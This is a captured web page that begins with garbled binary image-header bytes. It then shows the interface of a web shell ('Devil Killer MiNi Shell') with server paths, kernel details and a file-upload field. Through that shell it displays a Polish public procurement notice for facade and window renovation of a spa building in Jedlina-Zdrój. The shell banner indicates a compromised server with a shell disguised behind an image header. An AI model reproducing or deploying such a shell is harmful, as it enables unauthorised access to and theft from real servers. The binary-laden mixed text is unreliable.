JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241206/0063851301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> MODERNIZACJA ELEWACJI WRAZ Z WYMIANĄ STOLARKI OKIENNEJ I DRZWIOWEJ W BUDYNKU DOM ZDROJOWY W JEDLINIE-ZDROJU, PLAC ZDROJOWY 1 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uzdrowisko Szczawno-Jedlina S.A.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288308</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polskiego 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczawno-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-310</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mfajek@szczawno-jedlina.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szczawno-jedlina.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> MODERNIZACJA ELEWACJI WRAZ Z WYMIANĄ STOLARKI OKIENNEJ I DRZWIOWEJ W BUDYNKU DOM ZDROJOWY W JEDLINIE-ZDROJU, PLAC ZDROJOWY 1 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-73c7c5c7-a58a-40d2-992f-e0cc18072183</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00638513</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://szczawno-jedlina.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://szczawno-jedlina.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się za pomocą środka komunikacji elektronicznej, tj.<br/>platformy do elektronicznej obsługi zamówień publicznych Zamawiającego dostępnej pod adresem: https://szczawnojedlina.<br/>logintrade.net/rejestracja/ustawowe.html<br/>3. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa<br/>w art. 117 ust. 4 p.z.p. (oświadczenie wykonawców wspólnie ubiegających się o wykonanie zamówienia), oraz zobowiązanie<br/>podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 p.z.p., pełnomocnictwo, sporządza się w postaci elektronicznej,<br/>w formatach danych określonych w przepisach wydanych na podstawie art. 18 Ustawy z dnia 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne (Dz. U. z 2021r. poz. 2070), z zastrzeżeniem formatów, o których mowa w<br/>art. 66 ust. 1 p.z.p., z uwzględnieniem rodzaju przekazywanych danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt.<br/>4. Ofertę, a także oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, o którym mowa w<br/>Rozdziale X ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym wyłącznie za pośrednictwem Platformy.<br/>5. Informacje, oświadczenia lub dokumenty, inne niż określone w ust. 2 powyżej przekazywane w postępowaniu, sporządza się w<br/>postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 Ustawy z dnia 17 lutego 2005<br/>r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako tekst wpisany bezpośrednio do wiadomości<br/>przekazywanej przy użyciu środków komunikacji elektronicznej, o których mowa w § 3 ust. 1 Rozporządzenia Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 roku w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postepowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. z 2020r. poz. 2452), to jest za pośrednictwem Platformy, dostępnej pod adresem:<br/>https://gminawalbrzych.logintrade.net/rejestracja/ustawowe.html<br/>6. W przypadku gdy dokumenty elektroniczne w postępowaniu, przekazywane przy użyciu środków komunikacji elektronicznej,<br/>zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993r. o zwalczaniu<br/>nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w<br/>sposób opisany w Rozdziale XIV ust. 9 SWZ.<br/>7. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, sporządzone w języku obcym przekazuje się wraz z<br/>tłumaczeniem na język polski.<br/>(ze względu na ograniczoną ilość znaków, ciąg dalszy w dodatkowych informacjach)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">INFORMACJA O PRZETWARZANIU DANYCH OSOBOWYCH<br/>Osób biorących udział w postępowaniu o udzielenie zamówienia publicznego<br/>w Uzdrowisku Szczawno-Jedlina S.A.<br/>1. Administratorem Pani/Pana danych osobowych jest Uzdrowisko Szczawno-Jedlina S.A. z/s ul. Wojska Polskiego 6, 58-310<br/>Szczawno-Zdrój.<br/>2. Dane osobowe przetwarzane są zgodnie z art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem<br/>o udzielenie niniejszego zamówienia publicznego<br/>3. Dane pozyskiwane są bezpośrednio od Pani/Pana wyłącznie w zakresie koniecznym przeprowadzenia postępowania.<br/>4. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Prawo Zamówień Publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Prawo Zamówień Publicznych.<br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 74 p.z.p.,<br/>6. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/>22 RODO.<br/>7. Przysługuje Pani/Panu:<br/>a. prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po<br/>stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b. żądania sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie<br/>może naruszać integralności protokołu oraz jego załączników);<br/>c. prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o<br/>udzielenie zamówienia publicznego oraz przypadków, o których mowa w art. 18 ust. 2 RODO (zgłoszenie żądania ograniczenia<br/>przetwarzania nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania; w przypadku wniesienia<br/>żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO, od dnia zakończenia postępowania o udzielenie zamówienia<br/>Zamawiający nie udostępnia danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, chyba że<br/>zachodzą przesłanki, o których mowa w art. 18 ust. 2 RODO);<br/>d. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8. Nie przysługuje Pani/Panu:<br/>a. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>9. przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa.<br/>(ze względu na ograniczoną ilość znaków, ciąg dalszy w dodatkowych informacjach)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">INFORMACJA O PRZETWARZANIU DANYCH OSOBOWYCH<br/>Osób biorących udział w postępowaniu o udzielenie zamówienia publicznego<br/>w Uzdrowisku Szczawno-Jedlina S.A.<br/>1. Administratorem Pani/Pana danych osobowych jest Uzdrowisko Szczawno-Jedlina S.A. z/s ul. Wojska Polskiego 6, 58-310<br/>Szczawno-Zdrój.<br/>2. Dane osobowe przetwarzane są zgodnie z art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem<br/>o udzielenie niniejszego zamówienia publicznego<br/>3. Dane pozyskiwane są bezpośrednio od Pani/Pana wyłącznie w zakresie koniecznym przeprowadzenia postępowania.<br/>4. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Prawo Zamówień Publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Prawo Zamówień Publicznych.<br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 74 p.z.p.,<br/>6. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/>22 RODO.<br/>7. Przysługuje Pani/Panu:<br/>a. prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po<br/>stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b. żądania sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie<br/>może naruszać integralności protokołu oraz jego załączników);<br/>c. prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o<br/>udzielenie zamówienia publicznego oraz przypadków, o których mowa w art. 18 ust. 2 RODO (zgłoszenie żądania ograniczenia<br/>przetwarzania nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania; w przypadku wniesienia<br/>żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO, od dnia zakończenia postępowania o udzielenie zamówienia<br/>Zamawiający nie udostępnia danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, chyba że<br/>zachodzą przesłanki, o których mowa w art. 18 ust. 2 RODO);<br/>d. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8. Nie przysługuje Pani/Panu:<br/>a. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>9. przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa.<br/>(ze względu na ograniczoną ilość znaków, ciąg dalszy w dodatkowych informacjach)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP 36/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ROBOTY BUDOWLANE wykonywane w systemie zaprojektuj-wybuduj pn:<br/>Opracowanie kompleksowej dokumentacji projektowej wielobranżowej oraz wykonanie robót budowlanych:<br/>„MODERNIZACJA ELEWACJI WRAZ Z WYMIANĄ STOLARKI OKIENNEJ I DRZWIOWEJ W BUDYNKU DOM<br/>ZDROJOWY W JEDLINIE-ZDROJU, PLAC ZDROJOWY 1” wpisany do rejestru zabytków pod A/4216/1127/Wł z<br/>03.05.1985r na podstawie załączonego do postępowania Programu Funkcjonalno – Użytkowego.<br/>Przedmiot zamówienia obejmuje podział na 2 zadania:<br/>Zadanie 1: Usługę projektową opartą o załączony do niniejszego postępowania Program Funkcjonalno- Użytkowy (PFU),<br/>wraz z uzyskaniem wszelkich wymaganych uzgodnień, pozwoleń, decyzji itp., niezbędnych do rozpoczęcia robót i<br/>wykonania ich zgodnie<br/>z obowiązującymi przepisami prawa.<br/>Zadanie 2: Wykonanie robót budowlanych na podstawie wykonanego projektu.<br/>Roboty na Domu Zdrojowym będą prowadzone na czynnym obiekcie.<br/>Zamawiający wymaga 60 miesięcy gwarancji na wykonany przedmiot zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">19 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert<br/>Nr Nazwa kryterium Waga % Sposób punktowania – minimalizacja<br/>1 Cena brutto 100% Liczba punktów (C) = (cena najniższa zaproponowana w ofertach/cena badanej oferty) x 100<br/>1. Oferty będą oceniane następująco:<br/> Kryterium 1 – najtańsza cenowo oferta uzyska 100 pkt, pozostałe proporcjonalnie mniej.<br/>1) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Oferty.<br/>2) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu<br/>zamówienia.<br/>2. Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym<br/>zaoferowanej ceny.<br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie wymaga przedstawienia osobnych dowodów na<br/>potwierdzenie tego warunku<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to<br/>z odrębnych przepisów: Zamawiający nie wymaga przedstawienia osobnych dowodów<br/>na potwierdzenie tego warunku<br/>3) sytuacji ekonomicznej lub finansowej: Zamawiający nie wymaga przedstawienia osobnych dowodów na potwierdzenie<br/>tego warunku<br/>4) zdolności technicznej lub zawodowej:<br/>Dla zadania 1:<br/>a) Zamawiający wymaga wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub<br/>są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a<br/>jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy;<br/>w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże wykonanie min. 1 usługi projektowej podobnego rodzaju<br/>do usługi objętej zadaniem 1, tj. zawierającej minimum takie elementy projektowe jak elewacja, stolarka okienna lub<br/>drzwiowa i izolacja murów o wartości min. 50 000 zł, dotyczącej obiektu wpisanego do rejestru zabytków.<br/>b) Zamawiający wymaga wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami.<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że będzie dysponował następującymi osobami<br/>skierowanymi do realizacji zamówienia(zał. nr 8 do SWZ):<br/>1. Projektant branży architektonicznej - 1 osoba posiadająca uprawnienia do projektowania w specjalności architektonicznej<br/>bez ograniczeń, z doświadczeniem w projektowaniu dot. obiektów zabytkowych (należy wykazać min. 2 obiekty zabytkowe,<br/>których dotyczyły prace projektowe)<br/>2. Osoba sprawdzającą branży architektonicznej - 1 osoba posiadająca uprawnienia do projektowania w specjalności<br/>architektonicznej bez ograniczeń, z doświadczeniem w projektowaniu dot. obiektów zabytkowych (należy wykazać min. 2<br/>obiekty zabytkowe 